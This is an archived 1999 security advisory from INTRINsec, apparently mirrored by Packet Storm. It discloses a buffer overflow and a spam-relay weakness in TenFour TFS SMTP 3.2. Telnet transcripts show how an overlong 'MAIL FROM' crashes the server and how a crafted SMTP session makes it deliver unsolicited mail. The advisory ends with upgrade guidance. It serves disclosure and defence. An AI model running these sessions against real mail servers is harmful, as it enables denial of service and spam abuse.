smtp_bof.txt

1999-09-19T00:00:00
ID PACKETSTORM:15651
Type packetstorm
Reporter Packet Storm
Modified 1999-09-19T00:00:00

Description

                                        
                                            `Subject: [SECURITY] TenFour TFS SMTP 3.2 Buffer Overflow  
To: BUGTRAQ@SECURITYFOCUS.COM   
  
  
INTRINsec Security Advisory  
  
  
  
Release Date : August 30, 1999  
Software : TenFour TFS SMTP 3.2  
Operating System: Windows NT 3.x / 4.x  
Impact : The attackers can use a misconfigured TFS SMTP for  
spamming and can remotely crash the TFS SMTP Gateway.  
Author : Christophe.Lesur@INTRINsec.com  
Status : TenFour is advised from this.  
URLs : http://www.intrinsec.com/  
  
  
  
__ Diggest __  
  
  
  
The TenFour TFS SMTP Release 3.2 has two vulnerabilities : A buffer overflow  
and, under some circumstances and due to inherent TFS architecture, it can  
be used for spamming.  
  
  
Direct results are that an attacker can remotly crash your TFS SMTP Gateway  
or send unsollicited mails to someone ( and TFS ADMINISTRATOR ).  
  
  
Tenfour is advised from this. Thanks to Roberto Correnti for his support.  
(http://www.tenfour.com)  
  
  
  
__ Technical Details and Exploits __  
  
  
  
TENFOUR TFS SMTP Version 3.2 has two vulnerabilities : a buffer overflow and  
under some circumstances it can be used for spamming.  
  
  
First : Buffer Overflow.  
  
  
There is a major buffer overflow in TFS SMTP 3.2. When you connect to the  
SMTP service on port 25, you get the TFS PROMPT. After sending the 'helo'  
command, if you send a 'MAIL FROM' larger than 128 bytes, you will crash the  
SMTP service with a nice protection fault. It's basically a buffer overflow  
and this has been fixed in release 4.0  
  
  
This is the exploit :  
  
  
  
[clesur@raptor clesur]$ telnet mailhost.victim.com 25   
Trying 1.1.1.1...   
Connected to mailhost.victim.com.   
Escape character is '^]'.   
220 mailhost.victim.com is ready. TFS SMTP Server ver 3.2   
helo   
250 mailhost.victim.com, Hello   
  
  
mail from:<ddddddddddddd ... lots of char ... dddddddddddddddd>  
  
  
Connection closed by foreign host.   
  
  
  
  
Second : Spamming  
  
  
The TFS SMTP Engine accepts any mails by default and process them in its kernel.  
In case of a deficient message (wrong recipient, wrong domain...) TFS SMTP is   
usually configured to warn sender and the TFS ADMINISTRATOR by sending a 4-line warning   
AND the full message. Because there is no domain check before sending the message to   
the TFS core, it's possible to spam someone and the TFS administrator.  
  
  
  
This is the exploit :  
  
  
  
[clesur@raptor clesur]$ telnet mailhost.tfsvictim.com 25   
Trying 1.1.1.1...   
Connected to mailhost.tfsvictim.com.   
Escape character is '^]'.   
220 mailhost.tfsvictim.com is ready. TFS SMTP Server ver 3.2   
helo   
250 mailhost.tfsvictim.com, Hello   
mail from:<target@victim.com>   
250 Sender <target@victim.com> OK   
rcpt to:<target@victim.com>   
250 Recipient <target@victim.com> OK   
data   
354 Begin data transfer. End with period.   
from: target@victim.com   
to: target@victim.com   
  
  
<YOUR MESSAGE BODY HERE>   
.  
  
  
250 Message accepted   
quit   
221 Connection closed   
Connection closed by foreign host.   
  
  
  
The spammed user will receive this message in its mailbox.  
  
  
Message 22:   
From target@victim.com Thu Jul 29 09:49:40 1999   
Delivered-To: target@victim.com   
From: target@victim.com   
Date: Thu, 29 Jul 1999 11:44:03 +0200   
Subject: <No subject>   
MIME-version: 1.0   
Content-transfer-encoding: quoted-printable   
  
  
####################################################   
This message was not delivered to   
target@victim.com  
TFS Admin was informed with a copy of this message   
Sender was informed with a copy of this message   
####################################################   
  
  
<YOUR MESSAGE BODY HERE>  
  
  
  
__ Solutions __  
  
  
For theses vulnerabilities, TenFour suggests upgrading to a version greater  
than 4.0.  
  
  
__ Contacts __  
  
  
  
-- Tenfour --  
  
  
TenFour South Europe   
ITFamily Sarl   
Le Technoparc   
15, rue Edouard Jeanneret   
78306 Poissy Cedex   
France   
Tel: +33 1 39 22 65 15   
Fax: +33 1 39 11 49 77   
WWW: http://www.tenfour.fr   
  
  
-- INTRINsec --  
  
  
INTRINsec is a computer Security company.  
http://www.INTRINsec.com  
This advisory is available in french.  
Cet avis est disponible en francais sur notre site.  
  
  
  
__ DISCLAMERS __  
  
  
  
INTRINsec DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, AND PROVIDED  
THESES INFORMATIONS "AS IS" WITHOUT WARRANTY OF ANY KIND. INTRINsec IS NOT  
LIABLE FOR ANY DAMAGES WHATSOEVER EVEN IF INTRINsec HAS BEEN ADVISED OF THE  
POSSIBILITY OF SUCH DAMAGES.  
  
  
--  
Christophe Lesur Security Consultant  
INTRINsec   
mailto:christophe.lesur@INTRINsec.com  
`